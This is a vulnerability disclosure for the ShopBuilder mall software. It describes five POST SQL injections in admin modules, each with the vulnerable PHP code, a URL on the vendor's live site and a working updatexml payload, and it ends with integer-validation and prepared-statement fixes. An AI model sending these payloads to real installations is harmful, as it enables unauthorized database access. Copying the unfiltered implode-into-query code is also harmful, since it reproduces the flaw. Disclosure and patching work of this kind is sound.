ShopBuilder online mall: POST-type SQL injection, five cases (#1 to #5). The demo test against the official website succeeded.
There is no global filtering of POST data.
Just inject directly ~
#1
module/activity/admin/activity_product_list
if (!empty($_POST['chk'])) {
    @$id = implode(",", $_POST['chk']);
    // batch delete
    if ($_POST['submit'] == $lang['del'] and $id) {
        $sql = "delete from ".ACTIVITYPRODUCT." where product_id in ($id)";
        $db->query($sql);
        $sql = "update ".PRO." set promotion_id='0' where id in ($id)";
        $db->query($sql);
    }
}
chk is joined with implode() without any filtering, and the result is assigned to $id, which goes straight into the query.
POST data: chk[]=1) and 1=updatexml(1,concat(0x5c,(select user())),1)%23
Official website test
(Screenshot omitted; the code above is not part of the picture.)
#2
module/activity/admin/activity
Line 51:
if ($_POST['act'] == 'op') {
    if (is_array($_POST['chk'])) {
        $id = implode(",", $_POST['chk']);
        $sql = "delete from ".ACTIVITY." where id in ($id)";
        $db->query($sql);
        $sql = "delete from ".ACTIVITYPRODUCT." where activity_id in ($id)";
        $db->query($sql);
        foreach ($_POST['chk'] as $list) {
            $db->query("update ".PRO." set promotion_id=0 where promotion_id='$list'");
        }
    }
}
Injectable when act = op.
http://www.a5shop.cn/?m=activity/admin&s=activity
POST: chk[]=1) and 1=updatexml(1,concat(0x5c,(select user())),1)%23&act=op
#3
module/payment/admin/bank_account_mod
if (isset($_POST["action"])) {
    if (isset($_POST["result"])) {
        $add_time = time();
        if ($_POST["result"] == 1) {
            $sql = "update ".ACCOUNTS." set active=1, check_time='$add_time', censor='$_SESSION[ADMIN_USER]' where id=$_POST[id]";
            $db->query($sql);
        }
    }
}
When result = 1 and action has any value, the unfiltered id parameter is placed directly in the query and can be injected.
http://www.a5shop.cn/?m=payment/admin&s=bank_account_mod
POST: id=updatexml(1,concat(0x5c,(select user())),1)%23&action=a&result=1
#4
module/logistics/admin/logistics
if ($_POST['act'] and is_array($_POST['chk'])) {
    $id = implode(",", $_POST['chk']);
    if ($_POST['act'] == 'open') {
        $db->query("update ".LGSTEMP." set status=1 where id in ($id) ");
    }
    if ($_POST['act'] == 'close') {
        $db->query("update ".LGSTEMP." set status=0 where id in ($id) ");
    }
}
http://www.a5shop.cn/?m=logistics/admin&s=logistics
POST: chk[]=1) and 1=updatexml(1,concat(0x5c,(select user())),1)%23&act=open
#5
module/product/admin/product_comment
if ($_POST['act'] == 'op') {
    if (is_array($_POST['chk'])) {
        $id = implode(",", $_POST['chk']);
        foreach ($_POST["chk"] as $val) {
            $sql = "select * from ".PCOMMENT." where id=$val";
            $db->query($sql);
        }
    }
}
When act = op, each element of the chk array is taken as $val and used in the query without filtering.
http://www.a5shop.cn/?m=product/admin&s=product_comment
POST: chk[]=updatexml(1,concat(0x5c,(select user())),1)%23&act=op
Solution:
Filter the input: validate every value taken from chk[] and id as an integer before it reaches the query, or use prepared statements.
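One way to implement that filtering, as an added example that is not ShopBuilder's own code: every id from chk[] or id is whitelist-validated as a positive integer before any SQL is built, so a value shaped like "1) and 1=..." is rejected instead of being concatenated. $db->query() and the table constants are the ones used in the snippets above; the PDO variant assumes a PDO connection in $pdo, which the original code does not have.

```php
<?php
// Added example (not ShopBuilder code): validate ids before they reach SQL.
// Returns a comma-separated id list safe to place inside "in (...)", or null
// if chk is not a non-empty array of positive integers.
function safe_id_list($chk)
{
    if (!is_array($chk) || count($chk) === 0) {
        return null;
    }
    $ids = array();
    foreach ($chk as $val) {
        // Only digit strings (no leading zero) are accepted; anything else
        // aborts the whole request rather than dropping a single element.
        if (!preg_match('/^[1-9][0-9]*$/', (string)$val)) {
            return null;
        }
        $ids[] = (int)$val;
    }
    return implode(",", array_unique($ids));
}

// Scalar variant for handlers such as bank_account_mod, where id is a single value.
function safe_id($val)
{
    return preg_match('/^[1-9][0-9]*$/', (string)$val) ? (int)$val : null;
}

// Hardened batch delete from activity_product_list (#1). $db->query() is the
// wrapper the original snippets use; $lang['del'] is the page's delete label.
if (!empty($_POST['chk']) && $_POST['submit'] == $lang['del']) {
    $id = safe_id_list($_POST['chk']);
    if ($id === null) {
        exit('invalid id list'); // log and stop; never build the query
    }
    $db->query("delete from ".ACTIVITYPRODUCT." where product_id in ($id)");
    $db->query("update ".PRO." set promotion_id='0' where id in ($id)");
}

// Hardened single-row update from bank_account_mod (#3), using a PDO prepared
// statement so the id is bound as a parameter (assumes $pdo is a PDO connection).
if (isset($_POST['action'], $_POST['result']) && $_POST['result'] == 1) {
    $id = safe_id($_POST['id']);
    if ($id !== null) {
        $stmt = $pdo->prepare("update ".ACCOUNTS." set active=1, check_time=?, censor=? where id=?");
        $stmt->execute(array(time(), $_SESSION['ADMIN_USER'], $id));
    }
}
```

The same safe_id_list() call replaces implode(",", $_POST['chk']) in cases #2, #4 and #5; the per-element loops in #2 and #5 should iterate over the validated integers rather than over the raw $_POST['chk'].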